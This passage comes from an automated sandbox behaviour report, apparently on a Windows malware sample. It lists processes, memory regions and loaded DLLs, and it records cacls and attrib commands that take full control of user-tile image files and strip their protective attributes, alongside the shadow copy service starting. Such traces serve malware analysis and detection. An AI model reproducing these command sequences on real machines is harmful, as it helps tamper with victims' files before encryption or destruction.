"335" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ee0" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "334" os_parent_pid = "0xcf8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25165 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25166 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25167 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25168 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25169 start_va = 0xfa0000 end_va = 0xfa8fff entry_point = 0xfa0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25170 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25171 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name 
= "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25172 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25173 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25174 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25175 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25176 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25177 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25178 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25179 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 25180 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25181 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25182 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = 
"kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25183 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25184 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25185 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25186 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 458 os_tid = 0x188 Thread: id = 459 os_tid = 0xc9c Process: id = "336" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "334" os_parent_pid = "0xcf8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25187 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 25188 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25189 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25190 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25191 start_va = 0xdd0000 end_va = 0xdd6fff entry_point = 0xdd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25192 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25193 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25194 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25195 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25196 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25199 start_va = 0x50000 
end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25200 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 25201 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 25202 start_va = 0x6e2a0000 end_va = 0x6e2bcfff entry_point = 0x6e2a0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25204 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25205 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25206 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25207 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25208 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25209 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25210 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25211 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25212 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25213 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25214 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25215 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25216 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 460 os_tid = 0xce0 Process: id = "337" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x7ea16dc0" os_pid = "0xb88" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = 
"rpc_server" parent_id = "326" os_parent_pid = "0xc24" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006c0d8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 25222 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25223 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25224 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 25225 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 25226 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 25227 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 25228 start_va = 0xa0000 end_va = 0xb0fff entry_point = 0xa0000 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 25229 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 25230 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25231 start_va = 0x1d0000 end_va = 
0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25232 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 25233 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 25234 start_va = 0x420000 end_va = 0x49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 25235 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 25236 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 25237 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 25238 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 25239 start_va = 0x600000 end_va = 0x6fcfff entry_point = 0x600000 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 25240 start_va = 0x700000 end_va = 0xaf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 25241 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 25242 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 25243 start_va = 0xcb0000 end_va = 0xceffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000cb0000" filename = "" Region: id = 25244 start_va = 0xda0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 25245 start_va = 0xde0000 end_va = 0x10aefff entry_point = 0xde0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25246 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 25247 start_va = 0x1280000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 25248 start_va = 0x6e2c0000 end_va = 0x6e2c6fff entry_point = 0x6e2c0000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 25249 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25250 start_va = 0x6e450000 end_va = 0x6e45ffff entry_point = 0x6e450000 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 25251 start_va = 0x6e950000 end_va = 0x6e963fff entry_point = 0x6e950000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 25252 start_va = 0x6e970000 end_va = 0x6e9aafff entry_point = 0x6e970000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 25253 start_va = 0x6f8f0000 end_va = 0x6f8f7fff entry_point = 
0x6f8f0000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 25254 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 25255 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 25256 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 25257 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 25258 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 25259 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 25260 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 25261 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 
25262 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25263 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25264 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 25265 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 25266 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 25267 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25268 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25269 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 25270 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25271 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 25272 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25273 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25274 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25275 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25276 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 25277 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25278 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25279 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 
region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25280 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25281 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25282 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25283 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25284 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25285 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 25286 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25288 start_va = 
0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25289 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25290 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25291 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25292 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25293 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 25294 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25295 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25296 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25297 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25298 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25299 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25300 start_va = 
0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 25301 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 25302 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 25461 start_va = 0x6dab0000 end_va = 0x6db2afff entry_point = 0x6dab0000 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 25462 start_va = 0x6e2a0000 end_va = 0x6e2a9fff entry_point = 0x6e2a0000 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Region: id = 25463 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Thread: id = 461 os_tid = 0xc1c Thread: id = 462 os_tid = 0xcdc Thread: id = 463 os_tid = 0xc3c Thread: id = 464 os_tid = 0xd38 Thread: id = 465 os_tid = 0xd00 Thread: id = 466 os_tid = 0xcd4 Thread: id = 467 os_tid = 0xa18 Thread: id = 486 os_tid = 0xd74 Thread: id = 608 os_tid = 0xfbc Thread: id = 942 os_tid = 0xf34 Process: id = "338" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G 
